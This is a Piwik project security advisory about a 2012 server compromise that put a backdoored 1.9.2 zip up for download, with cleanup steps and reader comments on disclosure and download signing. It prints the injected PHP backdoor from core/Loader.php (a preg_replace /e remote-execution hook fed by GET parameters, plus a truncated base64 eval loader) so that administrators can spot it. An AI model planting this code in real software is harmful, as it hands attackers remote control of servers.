English
Security Report: Piwik.org webserver hacked for a few hours on 2012 Nov 26th
Important Security Announcement: Piwik.org webserver got compromised by an attacker on 2012 Nov 26th, this attacker added a malicious code in the Piwik 1.9.2 Zip file for a few hours.
How do I know if my Piwik server is safe?
You would be at risk only if you installed or updated to Piwik 1.9.2 on Nov 26th from 15:43 UTC to 23:59 UTC.
If you are not using 1.9.2, or if you have updated to 1.9.2 earlier than Nov 26th 15:40 UTC or from Nov 27th, you should be safe.
How do I double check if my Piwik server is affected?
To check if your Piwik is affected, open the file piwik/core/Loader.php – a clean file looks like this, where as a compromised Loader.php would contain the following code at the end of the file:
<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$
If you see this malicious code in your piwik/core/Loader.php file, read below to fix this issue.
How do I fix my Piwik if it is compromised?
If you Piwik is compromised, follow these steps:
- Backup piwik/config/config.ini.php
- DELETE the piwik/ directory
It is important to DELETE the directory and all piwik files, to ensure any malicious script is deleted as well. - Download latest Piwik from piwik.org
- Unzip and Upload the piwik/ directory on your server
- Copy the config.ini.php back in /piwik/config/
- Go to Piwik, it should display the dashboard as expected
You have now successful restored Piwik to a clean version.
If you have other web softwares running in the same path on your server, we would recommend to be safe and restore a backup of these other softwares as well.
How did the attacker got in piwik.org?
Attacker used a security issue in a WordPress plugin we were using, and gained partial access to the piwik.org server.
Is there a security bug in Piwik software itself?
The website Piwik.org is running WordPress and got compromised, because of a security issue in a WordPress plugin. As far as we know, the Piwik software does not have any exploitable security issue. We have a security bug bounty program in place that rewards researchers for finding security issues in Piwik software, and disclosing them to us. We also document here how you can make your own Piwik data safer and secure your server.
Has any sensitive data been leaked?
Piwik is a self-hosted, open source software. Piwik.org does not track any web analytics data from any Piwik user. No personal or sensitive data has been leaked since we do not track any.
What we are doing to prevent further issues
We are still working with our system administrators on the issue and have some ideas to make this kind of problems much less likely to occur. We will post a follow up once these new mechanisms are in place.
Summary
We would like to thank the Piwik users who quickly reported this problem (by email and in the forums). We received more than five reports in a two hours timeframe, which shows that the Piwik community is very vigilant and ready to react to any problem.
We are truly sorry for the inconvenience. Please be sure that we will do our best to keep Piwik (and Piwik.org) a safe place in the future.
Contact us at security@piwik.org if you need more info.
Subscribe to our rss feed: 
Posts or you can Suggest a topic to write about in the blog or See list of Features
Web Server Says:
This is very dangerous now a days am hearing so many news like this about hacking and the hackers ding really fantastic job sorry to say. Our servers are not so safe any more when the hackers hacked government sites too.
Jimmy Says:
This is bad news.. where are the attacks from? ..updating the last Piwik..
Niklas Says:
Would you please, please, disclose the plugin that was the cause of the breach?
Nicole Says:
Please disclose the goal or changes that would have been made by the hacked version of your software so that those affected can check those areas rather than simply saying, re-install everything else in your path on your server. For some that is quite a large task.
Piwik team Says:
We will not disclose more information regarding the attack, since the problem was fixed in the plugin. Our general recommendation is to update all WordPress plugins to their latest versions.
We will move the ZIP to a new server and architecture to prevent this from happening again. Stay tuned on the blog for an announcement when this is in place.
Investorenfinden Says:
Ich denke das Plugin sollte ganz schnell gelöscht werden. Dann sollte wieder alles im grünen Bereich sein.
Benjamin Says:
Besides other security measures please consider to move the published code to a completely different server. This would have easily prevented the hack.
A code repository does not belong on the same server as a webpage with wordpress + plugins.
Chris Says:
Yes please disclose the plugin. It is the responsible thing to do to prevent others from being hacked. If it was downloaded from wordpress.org and you disclose it will be removed from the repository and users who previously downloaded it will be notified of the vulnerability.
Sascha Says:
Disclose the WP-Plugin………………………………………………………
Piwik team Says:
> Well, how is it then that I suddenly received a “Piwik newsletter” in October, although I NEVER signed up for Piwik mails
Well certainly if you got a Piwik newsletter is because you signed up during the piwik installation process. Maybe you didn’t notice during the installation but for sure, you did sign up!
>PGP, SSL, SHA1 checksum…
we are thinking about these ideas and more, and will update in the Blog once we have implemented them.
> Was it just the zip file or did that guy also hit the subversion repositry? For simplicity I did pull stuff from there…
It was just the ZIP file, the SVN repo was not affected.
Scott W Says:
LOL, Check out the demo site, amazing what news of a minor intrusion will do for your pageview stats. Also notice the crickets chirping from the vendor side of the comments… Come on Piwik, are you gonna leave us hanging? Or address these very valid questions?
Stargazer Says:
Was it just the zip file or did that guy also hit the subversion repositry? For simplicity I did pull stuff from there…
Alexander Schestag Says:
I agree with Max and Gerald. Please, disclose the WordPress plugin that caused the issue to prevent others having the same issue. And I also agree with the other proposals for securing the download. https is an absolute must as well as PGP.
Christian Jensen Says:
What does the exploit do exactly? I could run it but I am not sure what the side effects would be.
Max Says:
I too would be interested to know which wordpress plugin caused the security issue. This would be an helpful information to prevent other sites from being hacked.
Nicolas Kuttler Says:
Oh, I would also be interested in the malicious payload itself. The snippet you pasted is incomplete.
Amit Shah Says:
Please use SSL for download links and PGP/GPG-sign binaries, hash information. That will take care of the major issues.
And in-place upgrades (directly from the installation) should be discouraged / disallowed to ensure they don’t get an infected version
Quist Says:
The copy I retrieved at Nov 26 21:32 seems ok. Perhaps the time span was shorter? Or maybe I got it through a mirror/cache at the ISP?
latest.zip?cb=1.9.2
6850442 bytes
Sha1: b7f7be56d733d9ff1529d271f4b1f0c3b9913090
Jonas Says:
I don’t think a PGP signature is too much to ask. Pretty much all other open source software is signed that way.
Ben Says:
You might want to consider to display the sha1 hash of the latest.zip below the download box.
Additionally the automatic updater should display the current sha1 hash that it downloaded and ask the user to verify the hash with the one on the website.
Of coure an attacker would be able to change the displayed hash below the download box, but it is one more step to do and it easier for the development team to see if something has changed.
user Says:
> No personal or sensitive data has been leaked since we do not track any.
Well, how is it then that I suddenly received a “Piwik newsletter” in October, although I NEVER signed up for Piwik mails and run a Piwik installation for quite a while now? When and how had my mail address been transferred to the Piwik server? The following statement in that mail is clearly wrong and reminds me of unsolicited bulk email of another kind:
> You are receiving this newsletter because you have signed up during the Piwik installation to
receive Piwik emails.
So, no Piwik auto-updates any more here.
Gerald Says:
Would you mind disclosing what WordPress plugin was affected? This could prevent other sites from being hacked.